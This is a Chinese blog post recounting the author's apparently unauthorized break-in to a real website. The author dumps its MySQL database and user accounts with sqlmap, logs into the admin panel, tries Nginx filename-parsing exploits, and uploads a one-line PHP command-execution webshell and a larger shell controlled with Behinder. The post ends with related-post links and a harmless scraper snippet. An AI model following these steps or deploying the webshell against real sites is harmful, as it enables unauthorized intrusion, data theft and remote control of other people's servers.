首次渗透实战笔记

最新推荐文章于 2025-09-10 13:46:55 发布
原创 最新推荐文章于 2025-09-10 13:46:55 发布 · 7.7k 阅读 · 9 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #web安全

本文记录了一次SQL注入攻击的过程,从验证SQL注入、爆库、爆用户信息,到利用Nginx解析漏洞尝试图片解析和上传小马。最终通过上传Webshell并成功连接,揭示了网络安全中的常见攻击手段和防御挑战。

首次渗透实战测试笔记

偶然得知该网站存在sql注入,手工有点差,直接使用了sqlmap进行暴库。网站没有防火墙,所以相对比较轻松。

信息收集

1.SQL注入验证存在

数据库为 mysql
the back-end DBMS is MySQL
web application technology: PHP 5.3.29, Nginx 1.14.1
back-end DBMS: MySQL >= 5.6 (Percona fork)

2.爆数据table

3.爆用户账户

4.MySQL权限只有个usage,权限较低

5.尝试登录网站

  • 首先需要获得网站的管理界面

    使用御剑后台扫描珍藏版爆破,可能是操作姿势不对,无果

    使用御剑爆破,用自带的字典爆出了robots.txt

  • /adm/登录后台

在这里插入图片描述

  • 寻找上传编辑器
    在这里插入图片描述

    找到了一处上传商品图片地方,想到可以使用图片解析漏洞

nginx 1.14.1解析漏洞

漏洞原理

1,Nginx越界读取缓存漏洞(CVE-2017-7529) 可以读取到缓存文件中位于“HTTP返回包体”前的“文件头”、“HTTP返回包头”等内容。
2,Nginx 文件名逻辑漏洞(CVE-2013-4547) 主要原因是错误地解析了请求的URI,错误地获取到用户请求的文件名,导致出现权限绕过、代码执行的连带影响。
3,Nginx解析漏洞复现 第3和第2都是文件解析漏洞,只是利用的方式不同,第2利用方式为:1.png.php。而第3利用方式为:1.png/.php。这样,1.png文件就会当成php文件进行解析。从而造成代码执行等。

测试nginx漏洞

  1. 准备php,命名为2fuckm.php

    <?php system($_GET['cmd']);?>

  2. 然后上传该文件,进行抓包

  3. 文件名后面加上一个空格,进行放包

  4. 前端通过图片右键可以复制图片的网址,然后访问图片,发现网址存储图片的位置,先访问刚才上传的网址,不存在

    界面报404错误,上传的文件找不到,是因为浏览器自动将空格编码为%20,服务器中找不到文件。

  5. 发送请求并使用burpsuite抓包。进到16进制中,在.jpg和.php中间加入 [20][00]

  6. 放到重放器

  7. 复现失败,错误原因不清楚

上传小马

图片解析失败,尝试上传小木马远控

上传没有对上传文件进行限制,所以可以直接上传

在这里插入图片描述

可以直接访问,但是菜刀连接失败,原因不清,有表哥说是因为get,post问题

直接上传大马,可以直接访问webshell,使用冰蝎3连接成功

提权目前还需要深入研究

红队内网攻防渗透:内网渗透之内网各种工具平台的使用
HACKONE的博客
04-10 1757
红队内网攻防渗透内网各种工具平台的使用 内网各种工具平台的使用
渗透测试实战指南笔记
weixin_67830340的博客
04-07 2336
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache、Nginx、MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包。 首先,下载需要的安装包,命令如下所示。 wegt http://dl.wdlinux.cn/files/lanmp_v3.tar.gz 下载完成后进行解压,解压文件的命令为tar zxvf lanmp_v3.tar.gz,运行环境如下图所示。 输入sh lanmp.sh命令运行LANMP,这时程序中会有5个选项,如下
Nginx 解析漏洞复现
m0_55821391的博客
10-08 883
.漏洞描述 该漏洞Nginx、php版本无关,属于用户配置不当造成的解析漏洞。 二.漏洞复现 1.使用docker搭建漏洞环境 2.执行如下命令,运行环境 docker-compose up -d 3.浏览器访问192.168.0.121 4.下载图片打开,写一句php代码保存 5.选择保存好的图片上传 6.上传成功 7.根据路径访问,图片显示正常 8..php访问,代码执行,存在漏洞(url结尾不一定是‘.php’,任何服务器端不存在的php文件均可,比如’
nginx-1.14.0.zip_nginx fastcgi
12-31
nginx-1.14.0.zip
DC-5靶机渗透实战笔记
qq_43571759的博客
03-31 1494
DC-5渗透实战 做到DC-5才知道前面几个靶机还是蛮正常,这个靶机坑了我好多时间,希望这些时间花的值得… 前面的还是一如既往,同样还是nmap扫描主机,开放端口和系统版本 感觉这次的靶机有些许不同了,这里开放了两个端口,80和111111是RPC服务的端口号 先进入网站看看 前面四个页面都是密密麻麻的英语的静态页面,是没有什么搞头的,最后一页才有这张可以输入的页面 随便提交了点东西,发现...
冰河的渗透实战笔记-冰河.pdf
05-18
冰河整理的全网首个开源的以实战案例为背景的渗透实战笔记,全书共442页,共计37万字(不计空格)。整本书的内容涵盖:Kali基础、渗透工具、木马制作、钓鱼链接生成、爆破密码、内存溢出攻击、web渗透、数据提权、社会工程学。
渗透学习笔记(十一)Burp Suite 总结
u012853375的博客
12-30 2098
前面我们学习了powershell的基础,其实我们在学习的时候,不可能一篇文章或者一个视频就可以把所有知识学到的,在了解到这个方面的知识后,多去查资料,最好的阅读官方文档,在使用中学习是最好的。这一章学习一个非常重要的工具 burp suite 这个是我们学习渗透测试必不可少的神器。
Linux实战学习笔记(第一节环境搭建)
mengke2024的博客
10-24 1787
学习网络安全安全渗透,黑客技术的详细完整笔记
渗透测试笔记——暴力破解、ssh公钥权限维持、GPU Wakuang程序(靶机系统:ubuntu)
W小哥
02-17 2260
本次实验主要是为了应急响应打基础,从攻击者的角度出发,知己知彼,百战不殆
14、植入后门:Strat Accounting 项目渗透实战
最新发布
week9的博客
09-10 36
本文详细介绍了在 Strat Accounting 项目中植入后门的实战过程,包括选择合适的代码植入位置、设置触发机制、环境监测、绕过检测策略以及有效载荷加载等关键步骤。通过精心设计的后门逻辑和隐蔽手段,确保后门在目标系统中稳定运行且不易被发现。文章还分析了潜在风险及应对措施,并展望了未来优化方向。
渗透测试学习笔记之案例一.pdf
04-06
渗透测试学习笔记
VulnHub渗透测试实战靶场笔记(持续更新)
晚风不及你
03-05 8705
Breach1.0 下载链接 https://download.vulnhub.com/breach/Breach-1.0.zip 靶机说明 Breach1.0是一个难度为初级到中级的BooT2Root/CTF挑战。 VM虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网卡设置为host-only方式组网。非常感谢Knightmare和rastamouse进行测试和提供反馈。...
渗透学习笔记
Trave-ler
11-06 3111
一、SQL注入漏洞 SQL注入:web程序对用户输入数据的合法性没有判断,前端传入后端的参数可控的,并且参数带入数据库查询,攻击者可通过构造SQL语句来实现对数据库的任意操作。 1.sql注入原理 满足条件: ​ 参数用户可控:前端传入后端的内容用户可以控制 ​ 参数带入数据库查询:传入的参数拼接到SQL语句,且带入数据库查询。 原因:用户输入的数据被SQL解释器执行 2.注入漏洞分类 1)数字型注入 当输入的参数为整型时,如:ID、年龄、页码,若存在注入漏洞,则可认为是数字型 测试:
项目五linux 内网完整渗透测试实例笔记
qq_56426046的博客
01-29 2384
本靶场存在三个 flag 把下载到的虚拟机环境导入到虚拟机,本靶场需要把网络环境配置好。在 wdcp 生成秘钥保存下来 在 kali 设置权限 600你知道什么叫幸福嘛?幸福就是拍拍手。
整理了一套很棒的渗透测试笔记合集,建议收藏
dzqxwzoe的博客
03-12 499
首先先通过对 HTTP 中间人攻击的来了解到 HTTP 为什么是不安全的,然后再从安全攻防的技术演变一直到 HTTPS 的原理概括,希望能让大家对 HTTPS 有个更深刻的了解。网络安全入门学习路线其实入门网络安全要学的东西不算多,也就是网络基础+操作系统+中间件+数据库,四个流程下来就差不多了。1.网络安全法和了解电脑基础其中包括操作系统Windows基础和Linux基础,标记语言HTML基础和代码JS基础,以及网络基础、数据库基础和虚拟机使用等...
《冰河的渗透实战笔记》电子书,442页,37万字,正式发布!!
冰河的专栏
05-18 9255
全网首个开源的以实战案例为背景的渗透实战笔记,全书共442页,共计37万字(不计空格)。整本书的内容涵盖:Kali基础、渗透工具、木马制作、钓鱼链接生成、爆破密码、内存溢出攻击、web渗透、数据提权、社会工程学。
linux nginx漏洞修复,nginx-1.14.1nginx-1.15.6 发布,修复HTTP/2和MP4模块中的漏洞
weixin_39854369的博客
05-15 858
nginx-1.14.1 稳定版和nginx-1.15.6主线版本已经发布,修复了HTTP/2(CVE-2018-16843,CVE-2018-16844)和MP4模块(CVE-2018-16845)中的漏洞nginx 1.14.1更改*)安全性:使用HTTP/2时,客户端可能会导致过多的内存消耗(CVE-2018-16843)和CPU使用率(CVE-2018-16844)。*)安全性:使用ng...
Nginx文件解析漏洞
qq_52072846的博客
02-23 4906
实验目的: 掌握Nginx环境配置的方法 理解Nginx文件解析漏洞 实验环境: 在centos7或者kali虚拟机上需要安装好docker和ubuntu14 1. Docker 要求 CentOS 系统的内核版本高于 3.10,查看本页面的前提条件来验证你的CentOS 版本是否支持 Docker 。 通过 uname -r 命令查看你当前的内核版本 2. 如果安装过请先卸载 yum remove docker \ docker-client \ ...
冰河的渗透实战笔记
05-11
### 冰河渗透测试实战笔记的相关资源 冰河的《渗透测试实战笔记》是一本专注于实际操作和技术应用的安全类电子书,其内容涵盖了大量实用的技术案例和实践经验[^1]。该书的特点在于注重实战而非单纯理论讲解,适合初学者快速入门并实践网络安全领域中的渗透测试技能。 #### 资源获取方式 对于希望获得此电子书或其他相关教程的学习者来说,可以尝试通过以下途径寻找相关内容: 1. **官方网站或作者博客** 通常情况下,安全技术书籍的作者会在个人网站或者博客中分享部分章节预览以及购买链接。例如,《冰河的渗透实战笔记》可能在其官网提供试读版下载或详细介绍页面[^2]。 2. **在线学习平台** 像 Udemy、Coursera 这样的教育平台上可能会有基于此类主题开发的课程。虽然这些课程未必完全复制自某一本特定书籍,但它们往往能够补充更多动态演示视频等内容形式,帮助理解复杂概念。 3. **GitHub 开源项目** 鉴于提到过编写过多本开源电子书的经历[^3],不妨前往 GitHub 搜索是否有类似的公开仓库存在。“IceRiver”作为关键词配合其他限定条件(如 `in:title`),或许能找到一些有价值的资料集合。 4. **社区论坛交流区** Hacker News、Reddit 的 r/netsec 子板块都是讨论信息安全话题的好地方,在那里提问关于具体教材的需求也容易引起志同道合者的注意进而得到推荐清单。 5. **图书馆借阅服务** 如果所在地区支持数字化馆藏,则可以直接查询本地公共/大学图书馆是否收录了目标作品;即使未找到确切版本号也可能发现相似替代品供参考之用。 以下是实现简单爬虫脚本来抓取网络上潜在可用链接的一个 Python 示例程序片段: ```python import requests from bs4 import BeautifulSoup def search_resources(query): url = f"https://www.google.com/search?q={query}" headers = {"User-Agent": "Mozilla/5.0"} response = requests.get(url, headers=headers) soup = BeautifulSoup(response.text, 'html.parser') results = [] for item in soup.select('.tF2Cxc'): title = item.find('h3').get_text() link = item.find('a')['href'] snippet = item.find('span', class_='st').get_text() result = { "title": title, "link": link, "snippet": snippet } results.append(result) return results if __name__ == "__main__": query = input("Enter your query: ") resources = search_resources(query) for res in resources[:5]: print(f"{res['title']}\n{res['link']}\n{res['snippet']}\n") ```
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

脚本实习生

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值